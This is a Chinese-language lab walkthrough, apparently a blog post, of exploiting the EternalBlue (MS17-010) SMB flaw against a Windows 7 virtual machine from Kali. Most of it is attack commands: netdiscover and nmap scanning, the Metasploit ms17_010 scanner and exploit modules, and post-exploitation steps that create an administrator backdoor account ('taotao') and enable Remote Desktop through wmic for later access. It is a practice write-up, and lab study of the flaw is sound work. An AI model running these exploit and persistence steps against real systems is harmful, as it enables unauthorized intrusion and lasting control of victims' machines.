永恒之蓝(445端口)完整利用过程
前几天有一次比赛的时候接触到了永恒之蓝漏洞,之前也没复现过永恒之蓝漏洞,在查资料方面花费了很多时间,就想着写篇博客记录一下。
前置环境:
kali,win7虚拟机,msf(kali自带)
一 · 扫描网络中存活主机
使用命令:
netdiscover -i eth0 -r 192.168.1.1/24
PS:由于这里使用的是虚拟机,所以网卡显示为 VMware
二 · 扫描当前主机存活端口
使用命令:
nmap -sV -n 192.168.1.1
三 · 开启MSF并利用搜索并检测是否能利用永恒之蓝
开启MSF:
msfconsole
检测永恒之蓝是否能利用 :
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
set RHOST 192.168.1.2
经过检测可以发现永恒之蓝漏洞可以利用
四 · 利用永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalblue
剩下的命令不再做文本解释
成功获得shell
=================================================================
so,获得shell之后应该做什么呢???
新建一个用户,以便下次访问。并将该用户升为管理员权限,这样就可以拥有更大的权限了
新建用户并添加到管理员中
net user taotao 123 /add
net localgroup administrators taotao /add
查看是否成功操作
net user 查看本地用户列表
net localgroup administrators
但是光有shell权限太不方便了,再开启一个3389方便远程连接
远程连接之前需要判断对方用户在不在线
开启远程桌面服务
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1